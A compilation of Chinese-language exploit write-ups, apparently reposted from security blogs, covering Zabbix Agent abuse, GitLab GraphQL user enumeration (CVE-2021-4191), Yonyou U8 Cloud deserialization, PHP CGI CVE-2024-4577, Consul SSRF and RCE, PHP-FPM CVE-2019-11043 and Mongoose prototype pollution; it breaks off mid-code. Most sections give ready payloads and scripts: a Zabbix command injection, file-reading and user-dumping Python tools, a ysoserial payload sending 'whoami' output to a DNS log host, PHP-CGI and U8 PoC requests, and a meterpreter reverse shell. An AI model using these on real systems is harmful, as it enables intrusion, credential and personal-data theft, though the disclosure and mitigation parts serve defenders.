在拥有 Zabbix Server 权限后，如何利用当前权限进一步控制 Zabbix Agent？前文讲到，Zabbix Agent 的 10050 端口仅处理来自 Zabbix Server 或 Proxy 的请求，所以后续攻击都是依赖于 Zabbix Server 权限进行扩展。

在 zabbix 中，我们要监控的某一个指标，被称为“监控项”，就像我们的磁盘使用率，在 zabbix 中就可以被认为是一个“监控项”(item)，如果要获取到“监控项”的相关信息，我们则要执行一个命令，但是我们不能直接调用命令，而是通过一个“别名”去调用命令，这个“命令别名”在 zabbix 中被称为“键”(key)，所以在 zabbix 中，如果我们想要获取到一个“监控项”的值，则需要有对应的“键”，通过“键”能够调用相应的命令，获取到对应的监控信息。

在控制 Zabbix Server 权限的情况下可通过 zabbix_get 命令向 Agent 获取监控项数据，比如说获取 Agent 的系统内核信息：

关于监控项，可以参考：

Agent监控项较多不一一例举，可以参考：

1. Zabbix Agent监控项

2. Zabbix Agent Windows监控项

针对 item 监控项的攻击面进行挖掘，存在以下利用场景：

3.1 EnableRemoteCommands 参数远程命令执行

前文讲到，Agent 远程执行系统命令需要在 zabbix_agentd.conf 配置文件中开启 EnableRemoteCommands 参数。

在 Zabbix Web 上添加脚本，Execute on 选项可根据需求选择，选择 Zabbix server 不需要开启 EnableRemoteCommands 参数，所以一般控制 Zabbix Web 后可通过该方式在 Zabbix Server 上执行命令拿到服务器权限。

如果要指定某个主机执行该脚本，可从 Zabbix Web 的“监测中 -> 最新数据”功能中根据过滤条件找到想要执行脚本的主机，单击主机名即可在对应 Agent 上执行脚本。

如果类型是 Execute on Zabbix Agent ，Agent 配置文件在未开启 EnableRemoteCommands 参数的情况下会返回报错。

如果不想在 Zabbix Web 上留下太多日志痕迹，或者想批量控制 Agent，拿下 Zabbix Server 权限后可以通过 zabbix_get 命令向 Agent 执行监控项命令，在 Zabbix Web 执行脚本实际上等于执行 system.run 监控项命令。

3.2 UserParameter 自定义参数命令注入

当 Zabbiax Agent 的 zabbix_agentd.conf 配置文件开启 UnsafeUserParameters 参数的情况下，传参值字符不受限制，只需要找到存在传参的自定义参数 UserParameter，就能达到命令注入的效果。

以下面配置为例：

1	zabbix_get -s agent -p 10050 -k "ping[test && id]"

3.3 任意文件读取

Zabbix Agent 如果没有配置不当的问题，是否有其他姿势可以利用呢？答案是肯定的。

Zabbix 原生监控项中，vfs.file.contents命令可以读取指定文件，但无法读取超过 64KB 的文件。

zabbix_agentd 服务默认以低权限用户 zabbix 运行，读取文件受 zabbix 用户权限限制。开启 AllowRoot 参数情况下 zabbix_agentd 服务会以 root 权限运行，利用 vfs.file.contents 命令就能任意文件读取。

如果文件超过 64KB 无法读取，在了解该文件字段格式的情况下可利用 vfs.file.regexp 命令正则获取关键内容。

3.4 Windows 目录遍历

Zabbix原生监控项中，wmi.get命令可以执行 WMI 查询并返回第一个对象，通过 WQL 语句可以查询许多机器信息。

如：WQL 查询盘符

1	zabbix_get -s agent -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM Win32_LogicalDisk\"]"

利用 wmi.get命令进行目录遍历、文件遍历，结合 vfs.file.contents 命令就能够在 Windows 下实现任意文件读取。

基于 zabbix_get 命令写了个 python 脚本，实现 Windows 的列目录、读文件功能。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

import os import sys count = 0 def zabbix_exec(ip, command): global count count = count + 1 check = os.popen("./zabbix_get -s " + ip + " -k \"" + command + "\"").read() if "Cannot obtain WMI information" not in check: return check.strip() else: return False def getpath(path): return path.replace("\\","\\\\\\\\").replace("$","\\$") def GetDisk(ip): where = "" while(True): check_disk = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM Win32_LogicalDisk WHERE Name != '' " + where + "\\\"]") if check_disk: print(check_disk) where = where + "AND Name != '" + check_disk+ "'" else: break def GetDirs(ip, dir): drive = dir[0:2] path = dir[2:] where = "" while(True): check_dir = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Caption FROM Win32_Directory WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]") if check_dir: print(check_dir) where = where + "AND Caption != '" + getpath(check_dir) + "'" else: break def GetFiles(ip, dir): drive = dir[0:2] path = dir[2:] where = "" while(True): check_file = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM CIM_DataFile WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]") if check_file: if "Invalid item key format" in check_file: continue print(check_file) where = where + "AND Name != '" + getpath(check_file) + "'" else: break def Readfile(ip, file): read = zabbix_exec(ip, "vfs.file.contents[" + file + "]") print(read) if __name__ == "__main__": if len(sys.argv) == 2: GetDisk(sys.argv[1]) elif sys.argv[2][-1] != "\\": Readfile(sys.argv[1], sys.argv[2]) else: GetDirs(sys.argv[1],sys.argv[2]) GetFiles(sys.argv[1],sys.argv[2]) print("Request count: " + str(count))

3.5 Windows UNC 路径利用

在 Windows Zabbix Agent 环境中，可以利用 vfs.file.contents 命令读取 UNC 路径，窃取 Zabbix Agent 机器的 Net-NTLM hash，从而进一步 Net-NTLM relay 攻击。

Window Zabbix Agent 默认安装成 Windows 服务，运行在 SYSTEM 权限下。在工作组环境中，system 用户的 Net-NTLM hash 为空，所以工作组环境无法利用。

在域内环境中，SYSTEM 用户即机器用户，如果是 Net-NTLM v1 的情况下，可以利用 Responder 工具获取 Net-NTLM v1 hash 并通过算法缺陷解密拿到 NTLM hash，配合资源约束委派获取域内机器用户权限，从而拿下 Agent 机器权限。

也可以配合 CVE-2019-1040 漏洞，relay 到 ldap 上配置基于资源的约束委派进而拿下 Agent 机器权限。（此处直接结果直接引用，未做实验）

3.6 Zabbix Proxy 和主动检查模式利用场景

通过 zabbix_get 工具执行监控项命令只适合 Agent 被动模式且 10050 端口可以通讯的场景

如果在 Zabbix Proxy 场景或 Agent 主动检查模式的情况下，Zabbix Server 无法直接与 Agent 10050 端口通讯，可以使用比较通用的办法，就是通过 Zabbix Web 添加监控项。

其它配置同理，在此不做赘述。

参考

• Zabbix 攻击面挖掘与利用
• vulhub
• Zabbix 手册
• Zabbix监控原理及架构

CVE-2021-4191：GitLab GraphQL API 用户枚举（已修复）

本文转自 jake-baines 并作补充

2022年2月25日，GitLab发布了针对CVE-2021-4191的修复程序，该漏洞属于CWE-359 “向未经授权的攻击者暴露私人个人信息”的一个实例。此漏洞现已修复，影响GitLab 13.0及更高版本。该漏洞是由于执行某些GitLab GraphQL API查询时缺少身份验证检查造成的。远程未经身份验证的攻击者可以利用此漏洞收集已注册的GitLab用户名、姓名和电子邮件地址。我们对此问题的初始CVSSv3基本评分为5.3。

Metasploit 模块已可用，我们预计该漏洞会被用于信息收集和用户名列表生成。单独使用该漏洞的影响可能微乎其微，但如果结合暴力破解密码和撞库攻击，则可能造成严重后果。

Credit

该问题由高级安全研究员Jake Baines在Rapid7 的漏洞披露计划中发现并报告。

Impact

GitLab GraphQL API 信息泄露事件允许远程未经身份验证的攻击者恢复用户名、姓名，有时甚至包括电子邮件地址。乍一看，这似乎风险很小。然而，账户发现之所以是 MITRE ATT&CK 框架中的一项技术，是有原因的。收集有效用户账户列表是各种暴力破解攻击的第一步，例如密码猜测、密码喷洒和凭证填充攻击。

这类攻击看似简单，但却十分有效。包括Emotet、Fancy Bear和Nobelium在内的许多成功的恶意软件/组织都曾使用过这种技术。

开源攻击性安全社区也投入了大量时间开发暴力破解工具，这再次印证了暴力破解在实际攻击中仍然是一种可行的攻击手段。诸如ncrack、Patator、CrackMapExec和THC-Hydra等开源暴力破解工具就是例证。

利用攻击者提供的用户名列表实施攻击。GitLab GraphQL API 信息输出的是有效的用户名。因此，此漏洞与现有工具相辅相成。

虽然攻击者总是可以使用包含已知用户名的常用 字典，但暴力破解攻击利用被攻击组织的已知有效用户名，可以提高其成功几率。

此次信息泄露还可能使攻击者能够基于 GitLab 安装创建新的用户名字典——不仅包括 gitlab.com，还包括可以从互联网访问的其他 50,000 个 GitLab 实例。

这样的字典并非史无前例。2021年，Clubhouse 曾公开一个 API，允许未经认证的用户枚举 Clubhouse 的用户群。攻击者利用该 API 将数据合并到一个数据库中，然后将其发布到黑客论坛上供任何人使用。

需要注意的是，这并非 GitLab 首次从 API 泄露类似细节。早在 2015 年，MWR Infosecurity就发布了一篇博客文章和一个未经身份验证的远程Metasploit 模块，该模块使用 /api/v3/internal/discover?key_id= API 枚举用户帐户。

Exploitation

经与 GitLab 工程团队协商，我们确认该问题最初是在 GitLab 13.0 中引入的。

存在漏洞的端点是 /api/graphql。GitLab文档指出，身份验证使用个人访问令牌，如下所示。

然而，并非所有对该端点的请求都需要身份验证。GitLab 的 /-/graphql-explorer 端点是测试这一点的理想场所。在下图左侧，您可以看到一个用于获取所有用户 ID、姓名和用户名的 GraphQL 请求，右侧则是响应。

除了ID、姓名和用户名之外，攻击者还可以获取更多信息。以下列出了未经身份验证的远程攻击者可以窃取的更完整信息列表。

以下 Python 脚本将打印一个 CSV 文件，其中包含已发现的 ID、用户名、姓名、电子邮件地址以及用户是否为机器人。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115

### # Dumps GitLab's user base to CSV form. # # Requires GraphqlClient: pip install python-graphql-client ### from python_graphql_client import GraphqlClient import json import sys import argparse top_parser = argparse.ArgumentParser(description='A tool for dumping a GitLab userbase via GraphQL') top_parser.add_argument('--rurl', action="store", dest="rurl", required=True, help="The remote URL to send the requests to") args = top_parser.parse_args() client = GraphqlClient(endpoint=args.rurl) # first starts at 1 first = 1 query_header = """query { users""" query_paging_info = "" query_payload = """ { pageInfo { hasNextPage hasPreviousPage endCursor startCursor } nodes { id bot username email publicEmail name webUrl webPath avatarUrl state location status { emoji availability message messageHtml } userPermissions { createSnippet } groupCount groups { nodes{ id name fullName fullPath } } starredProjects { nodes{ name path fullPath } } projectMemberships { nodes { id createdAt } } namespace{ id name path fullName fullPath lfsEnabled visibility requestAccessEnabled sharedRunnersSetting } callouts { nodes{ featureName dismissedAt } } } } } """ more_data = True print("id,username,name,publicEmail,bot") while more_data == True: query = query_header + query_paging_info + query_payload json_data = client.execute(query=query) if "errors" in json_data: print("Received error in response. Exiting. ") print(json.dumps(json_data)) sys.exit(0) for user in json_data["data"]["users"]["nodes"]: print(user["id"] + "," + user["username"] + "," + user["name"] + "," + user["publicEmail"] + "," + str(user["bot"])) if json_data["data"]["users"]["pageInfo"]["hasNextPage"] == True: query_paging_info = "(after:\"" + json_data["data"]["users"]["pageInfo"]["startCursor"] + "\")" else: more_data = False

以下是上述输出的示例：

1 2 3 4 5 6

albinolobster@ubuntu:~$ python3 gitlab_enum.py --rurl http://10.0.0.6/api/graphql id,username,name,publicEmail,bot gid://gitlab/User/4,test,George,test@test.com,False gid://gitlab/User/3,support-bot,GitLab Support Bot,,True gid://gitlab/User/2,alert-bot,GitLab Alert Bot,,True gid://gitlab/User/1,root,Administrator,,False

除了构建用于凭证攻击的用户名列表外，攻击者还可以利用这些信息来发现受影响用户的其他社交媒体帐户和联系人。这可以通过查询单个 GitLab 个人资料页面或简单地将用户名、姓名和电子邮件地址与其他来源进行交叉比对来实现。这种信息收集方式使攻击者能够发起更复杂的网络钓鱼攻击。

Mitigation

除非您打算将 GitLab 作为任何人都可以访问的公共资源提供，否则请确保您的 GitLab 实例无法从互联网访问。当然，我们也强烈建议用户将 GitLab 服务器实例更新到最新版本（14.8.2、14.7.4 和 14.6.5）。禁用公开个人资料也是防止未经授权的信息收集的有效措施。

要禁用公开个人资料，请转到“管理区域”->“常规”->“可见性和访问控制”->“受限可见性级别”。然后选中“公开”旁边的复选框。这样应该可以阻止任何未登录的用户查看用户个人资料。

Disclosure timeline

• 2021年11月： Rapid7公司的Jake Baines初步发现并确认。
• 2021年11月18日，星期四：首次联系GitLabs
• 2021年11月23日，星期二：已向 GitLabs 提交问题 #1408214，并提供了完整的技术细节。
• 2022年1月17日，星期一：供应商表示，在11月和12月多次更新状态后，修复程序即将推出。
• 2022年2月8日，星期二：修复程序已准备就绪，经过测试，将在下一次安全更新中发布。
• 2022年2月25日，星期五： 发布了针对CVE-2021-4191的补丁
• 2022年3月1日，星期二： Metasploit模块PR#16252已提交，用于修复CVE-2021-4191漏洞。
• 2022年3月3日，星期四：公开披露CVE-2021-4191（本文档）

用友U8 Cloud 反序列化RCE漏洞复现

本文转自 OidBoy_G 并作补充

0x01 产品简介

用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。

0x02 漏洞概述

用友U8 Cloud存在多处（FileManageServlet和LoginVideoServlet）反序列化漏洞，系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作，结合系统本身存在的反序列化利用链，最终造成远程代码执行。

0x03 影响范围

用友U8 Cloud 所有版本

0x04 复现环境

FOFA：app=”用友-U8-Cloud”

0x05 漏洞复现

两处接口的反序列化漏洞路径：

1 2	/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet /servlet/~uap/nc.bs.sm.login2.LoginVideoServlet

PS：用友的反序列化漏洞大部分cc6就可以直接打，post请求传入反序列化的二进制数据 就可以进行命令执行，ysoserial工具集成了多种cc链，感兴趣的可以研究研究

工具地址：https://github.com/frohoff/ysoserial/releases/tag/v0.0.6

构造序列化数据(jdk1.8)

1	java -jar ysoserial-all.jar CommonsCollections6 "ping `whoami`.l4z6nq7x.dnslog.pw" >4.ser

PoC

1 2 3 4 5 6 7 8 9 10 11

POST /servlet/~uap/nc.impl.pub.filesystem.FileManageServlet HTTP/1.1 Host: your-ip Content-Type: * {{file(C:\Users\m1813\Desktop\4.ser)}} POST /servlet/~uap/nc.bs.sm.login2.LoginVideoServlet HTTP/1.1 Host: your-ip Content-Type: * {{file(C:\Users\m1813\Desktop\4.ser)}}

PS：里面生成序列化数据文件的路径自行修改

两个路径都可以打，自行测试

0x06 修复建议

官方修复方案 ：

用友安全中心已发布官方补丁：

https://security.yonyou.com/#/noticeInfo?id=400

https://security.yonyou.com/#/noticeInfo?id=399

临时修复方案：

使用ACL网络策略限制访问来源；

使用防护类设备对/servlet/uap/nc.impl.pub.filesystem.FileManageServlet和/servlet/uap/nc.bs.sm.login2.LoginVideoServlet路径进行防护。

PHP CGI 远程代码执行漏洞分析（CVE-2024-4577）

本文转自 洞源实验室 并作补充

本文分析了由DEVCORE团队研究发现的PHP CGI在Windows平台的远程代码执行漏洞（CVE-2024-4577），探讨了漏洞的技术细节、背景、利用条件以及修复建议。PHP官方团队已于2024年6月6日发布了新版本修复CVE-2024-4577，该漏洞利用前置条件较低且危害较大，建议尽快升级到安全版本。

0x00 漏洞概述

CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI的远程代码执行漏洞。

漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性，这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统，如简体中文（936）、繁体中文（950）和日文（932）。

0x01 影响范围

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

其他版本的PHP官方已不在维护，建议根据实际情况升级到安全版本或者关闭php-cgi的使用。

0x02 复现

使用php://input流接收POST请求传入的参数实现RCE``

1	{host}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

0x03 漏洞背景

PHP的SAPI（Server Application Programming Interface）是PHP为了在不同服务器环境中运行而提供的一套应用程序编程接口。SAPI定义了PHP如何与其所在环境的Web服务器或其它类型的服务器进行交互。简而言之，SAPI是PHP与服务器软件通信的桥梁。

在PHP中，通常有三种主流的SAPI实现方式：

PHP-FPM：这是一种FastCGI协议的解析器，它的主要任务是接收来自Web服务器，按照FastCGI协议格式封装的请求数据，并将其传递给PHP解释器进行处理。

mod_php****：这是Apache服务器的一个模块，专门用于处理PHP和Apache之间的数据交换工作。

PHP-CGI：它具备两种模式的交互能力，既可以作为CGI程序运行，也可以作为FastCGI服务运行。PHP-CGI在以CGI模式运行时爆出了安全漏洞CVE-2012-1823 。

发现漏洞的团队也用了这个趣图来比喻这三种SAPI。

回顾CVE-2012-1823这一PHP CGI环境下的安全缺陷，Web服务器将HTTP请求解析后转发给PHP脚本。以http://host/cgi.php?a=b为例，该请求可能在命令行中以php.exe cgi.php a=b的形式被处理。

根据RFC3875的规范，如果查询字符串内缺少未解码的等号，那么整个查询字符串应当被视为CGI的参数进行传递。这便意味着，如果URL中的查询字符串部分省略了等号，它将未经适当处理就被传递给php-cgi，为攻击者提供了注入非法命令行参数的机会。要有效利用这一漏洞，需了解php-cgi支持哪些命令行参数。

使用-d参数来指定配置项的值实现RCE：allow_url_include选项如果被设置为On，PHP将允许包含（include）通过URL指定的文件，auto_prepend_file%3dphp%3a//input：这个参数设置auto_prepend_file配置项，使其指向php://input流。php://input是一个可以读取通过POST方法发送到脚本的原始数据的流。通过设置这个配置，攻击者可以控制PHP脚本执行前自动包含的文件，这里实际上是包含了通过POST发送的数据。

0x04 漏洞原理

CVE-2024-4577是依托于Windows系统中字符编码转换的Best-Fit特性对CVE-2012-1823的绕过。Windows系统中字符编码转换的Best-Fit特性是指Windows操作系统在处理不同字符编码集之间的转换时使用的一种匹配机制。当系统中存在无法直接映射到目标编码集的字符时，Best-Fit特性会尝试寻找一个在语义或外观上最接近的字符来进行替代显示或处理。

这种特性在多语言支持和国际化软件的开发中非常重要，因为它可以提高不同语言环境下用户界面的可读性和一致性。然而，在某些情况下，Best-Fit特性也可能带来安全隐患，尤其是在处理来自不可信来源的输入时。例如，在Web应用中，如果攻击者能够利用Best-Fit特性将特殊字符转换为具有不同语义的字符，就可能绕过安全检查，导致安全漏洞，如这次的CVE-2024-4577就是利用了%ad这个特殊字符，通过Best-Fit匹配到的是连字符（”-“）。

查看这次补丁的commit来分析为什么是连字符（”-“）：

1	https://github.com/php/php-src/commit/4dd9a36c16#diff-680b80075cd2f8c1bbeb33b6ef6c41fb1f17ab98f28e5f87d12d82264ca99729R1798

PHP的源代码中原先已经实现了对特定字符（如连字符-）的过滤逻辑，这是对CVE-2012-1823的修复代码，如下是CVE-2012-1823的poc，对比CVE-2024-4577的poc可以看到，主要差别在于（连字符-）变成了%AD。

通过使用%ad代替常规的连字符-，绕过了原本应该阻止参数传递的安全机制，导致攻击者能够成功注入并执行非法的参数，为了修复CVE-2024-4577，在最新的代码更新中，考虑到了Windows系统中Best-Fit特性的影响，将所有高于0x80的字符也纳入了限制范围。代码注释中对此也进行了详细说明，阐述了采取这一措施的背景。

在CVE-2024-4577的poc中可以看到多了一个参数选项cgi.force_redirect。因为PHP增加了一个默认开启的配置cgi.force_redirect=1，仅允许通过重定向规则的请求来执行PHP CGI，不允许直接访问执行，要绕过这一特性，可以采取以下方法：

既然已经通过-d参数成功修改了其他配置，那么同样可以直接使用-d参数将cgi.force_redirect的值改为0，从而关闭这一重定向规则限制。

默认配置的XAMPP受影响的原因：

在 \conf\extra\httpd-xampp.conf 中存在如下的配置项

1 2 3 4 5 6 7 8 9

ScriptAlias /php-cgi/ "/xampp/php/" <Directory "/xampp/php"> AllowOverride None Options None Require all denied <Files "php-cgi.exe"> Require all granted </Files> </Directory>

ScriptAlias指令的意义是当用户访问网站的/php-cgi/路径时，将请求映射到了本地的/xampp/php/目录。这个目录包含了PHP环境的所有文件和组件，而该目录下就包含有php-cgi.exe程序。

当我们使用最早公开的poc，发现并不能复现

1 2	/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

原因就是为了验证请求是通过Web服务器的Action指令发起的，而不是用户直接对php-cgi进行的请求，php-cgi设置了“cgi.force_redirect”这一安全特性。该特性默认开启，它确保只有遵循特定重定向流程的请求才会被php-cgi处理，这样可以有效避免直接对php-cgi的潜在不当访问，于是在POC中添加-d cgi.force_redirect=0关闭这个校验规则，就可绕过限制。

CVE-2022-29153 consul SSRF

本文转自cokeBeer 并作补充

漏洞信息

• 漏洞类型：SSRF
• 漏洞版本：< 1.9.17，>= 1.10.0, < 1.10.10，>= 1.11.0, < 1.11.5
• 漏洞简介：http类型的health_check被重定向导致的SSRF

repo介绍

consul是一个用go语言编写的分布式应用管理服务器，目前在github上已经有24.7k个star

漏洞分析

consul提供了对于服务的health_check能力。首先安装一个漏洞版本的consul

1 2 3

curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add - sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com $(lsb_release -cs) main" sudo apt-get update && sudo apt-get install consul=1.10.9

然后启动一个consul服务器

1	consul agent -dev -enable-script-checks -node=web -ui

访问http://localhost:8500/可以看到consul的界面

编写一个ssrf.json作为poc，里面标志的http地址会将请求302重定向到127.0.0.1:80

1 2 3 4 5 6 7 8 9 10 11 12 13

{ "ID": "ssrf", "name": "ssrf", "port": 5001, "check": { "checkid": "ssrf_check", "name": "Check ssrf", "http": "http://fuzz.red/ssrf/127.0.0.1/", "method": "GET", "interval": "10s", "timeout": "1s" } }

使用如下指令将health_check注册到consul服务器

1	curl --request PUT --data @ssrf.json http://127.0.0.1:8500/v1/agent/service/register

可以看到添加成功

这时consul会主动运行health_check，请求被302重定向到内网，导致了SSRF。可以看到nc也收到了请求

修复方式

在agent/config.go中添加DisableRedirects字段，可以在服务器端配置，关闭health_check的重定向

参考链接

• https://github.com/advisories/GHSA-q6h7-4qgw-2j9p

Hashicorp Consul Service API远程命令执行漏洞

本文转自starnight_cyber 并作补充

简介

Consul是HashiCorp公司推出的一款开源工具，用于实现分布式系统的服务发现与配置。与其他分布式服务注册与发现的方案相比，Consul提供的方案更为“一站式”。Consul内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案，不再需要依赖其他工具（例如ZooKeeper等），使用方式也相对简单。

Consul使用Go语言编写，因此具有天然的可移植性（支持Linux、Windows和Mac OS X系统）；且安装包中仅包含一个可执行文件，便于部署，可与Docker等轻量级容器无缝配合。

在特定配置下，恶意攻击者可以通过发送精心构造的HTTP请求在未经授权的情况下在Consul服务端远程执行命令。

环境搭建

从 https://releases.hashicorp.com/consul/1.2.4/ 下载相应 Linux 版本，直接启动服务即可。

1	./consul agent -dev -client your-serv-ip -enable-script-checks

访问：http://your-serv-ip:8500/v1/agent/self

启用了 EnableRemoteScriptChecks: true

漏洞验证

1. 使用 MSF 进行测试，简要过程如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

msf6 > search Hashicorp Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/nomad_exec 2021-05-17 excellent Yes HashiCorp Nomad Remote Command Execution 1 exploit/multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec 2 exploit/multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API Interact with a module by name or index. For example info 2, use 2 or use exploit/multi/misc/consul_service_exec msf6 > use 2 [*] Using configured payload linux/x86/meterpreter/reverse_tcp

可以看到成功创建 meterpreter。

修复措施

1. 禁用Consul服务器上的脚本检查功能
2. 确保Consul HTTP API服务无法通过外网访问或调用
3. 对/v1/agent/service/register 禁止PUT方法

参考

https://blog.csdn.net/qq_44159028/article/details/115870000

https://releases.hashicorp.com/consul/1.2.4/

https://blog.pentesteracademy.com/hashicorp-consul-remote-command-execution-via-services-api-d709f8ac3960

以上！

CVE-2019-11043漏洞分析与复现

本文转自STong66 并作补充

漏洞描述

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时，会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO

为空的情况下，存在逻辑缺陷。攻击者通过精心的构造和利用，可以导致远程代码执行。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下：

1 2 3 4 5 6 7 8 9 10 11 12 13

location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }

攻击者可以使用换行符（％0a）来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空，从而触发该漏洞。

漏洞类型

远程代码执行漏洞

危险等级

高危

利用条件

nginx配置了fastcgi_split_path_info

受影响系统

PHP 5.6-7.x，Nginx>=0.7.31

漏洞复现

使用某个大佬的 docker 环境进行复现：

PHP-FPM 远程代码执行漏洞（CVE-2019-11043）

https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md

准备工作：安装 docker、golang 环境

在kali中使用如下命令安装docker和golang：

1 2	sudo apt-get install docker docker-compose sudo apt install golang

搭建漏洞环境

1 2	git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 && docker-compose up -d

安装漏洞利用工具

1 2 3

git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go get -v && go build

漏洞利用

在phuip-fpizdam目录下执行 go run . “http://127.0.0.1:8080/index.php"后成功显示漏洞利用成功。

在浏览器进行了如下请求，成功复现，可以执行系统命令,id可以替换为其他OS命令。

漏洞分析

具体漏洞信息可参考：https://github.com/php/php-src/commit/ab061f95ca966731b1c84cf5b7b20155c0a1c06a/#diff-624bdd47ab6847d777e15327976a9227

有漏洞信息可知漏洞是由于path_info 的地址可控导致的，我们可以看到，当path_info 被%0a截断时，path_info 将被置为空，回到代码中我就发现问题所在了。

如下漏洞代码

在代码的1134行我们发现了可控的 path_info 的指针env_path_info

其中

env_path_info 就是变量path_info 的地址，path_info 为0则plien 为0。

slen 变量来自于请求后url的长度 int ptlen = strlen(pt); int slen = len - ptlen;

由于apache_was_here这个变量在前面被设为了0，因此path_info的赋值语句实际上就是：

1	path_info = env_path_info ? env_path_info + pilen - slen : NULL;

env_path_info是从Fast CGI的PATH_INFO取过来的，而由于代入了%0a，在采取fastcgi_split_path_info ^(.+?\.php)(/.*)$;这样的Nginx配置项的情况下，fastcgi_split_path_info无法正确识别现

在的url，因此会Path Info置空，所以env_path_info在进行取值时，同样会取到空值，这也正是漏洞原因所在。

Mongoose Prototype Pollution Vulnerability in automattic/mongoose(CVE-2023-3696)

本文转自ehhthing 并作补充

If an attacker has some way to control an object on the Mongo server through one way or another, it is possible to cause prototype pollution on any Mongoose client. Notably, if a poorly implemented service allows a user to control the object in findByIdAndUpdate and similar functions, this bug could be triggered through the $rename operator. Another possibility is if two different services interact with the same Mongo database, it is possible that one of them allows a user to inject an arbitrary object containing a __proto__ field, which would also trigger this bug.

If used with Express and EJS, this bug can easily lead to RCE. Many other libraries have known prototype pollution exploits as well, which may cause significant impact.

Allowing user input directly into update operations seems to be a very common pattern. For example, if we ask GPT-4 a basic prompt for updating a post using Mongoose, it gives us:

Prompt:

Using Express and Mongoose, take input from the user to find a “Post” by an id, and update its fields.

Response:

In Express and Mongoose, you can use the findByIdAndUpdate method to find a “Post” by an id and update its fields. Here’s how you can do it:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

const express = require('express'); const mongoose = require('mongoose'); const Post = require('./models/post'); // Assuming you have a Post model in models/post.js const app = express(); app.use(express.json()); // for parsing application/json app.put('/post/:id', async (req, res) => { const { id } = req.params; try { const post = await Post.findByIdAndUpdate(id, req.body, { new: true }); // new: true returns the updated post rather than the original post when the operation began if (!post) { return res.status(404).send(); } res.send(post); } catch (e) { res.status(400).send(e); } });

In the above example, req.params.id is used to get the id from the URL. The req.body is used to get the updated data from the user. The { new: true } option is used to return the updated post.

Proof of concept:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

import { connect, model, Schema } from 'mongoose'; await connect('mongodb://127.0.0.1:27017/exploit'); const Example = model('Example', new Schema({ hello: String })); const example = await new Example({ hello: 'world!' }).save(); await Example.findByIdAndUpdate(example._id, { $rename: { hello: '__proto__.polluted' } }); // this is what causes the pollution await Example.find(); const test = {}; console.log(test.polluted); // world! console.log(Object.prototype); // [Object: null prototype] { polluted: 'world!' } process.exit();

Resulting Database Entry

1 2 3 4 5 6 7 8

exploit> db.examples.find({}) [ { _id: ObjectId("64a757117e3dbf11b14e0fd4"), __v: 0, ['__proto__']: { polluted: 'world!' } } ]

Explanation

When Mongoose finds documents and reads the malicious document into an object, it uses an object with a prototype. If the top level object contains a __proto__ field, it leads to overwrites of the object prototype.

Affected Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

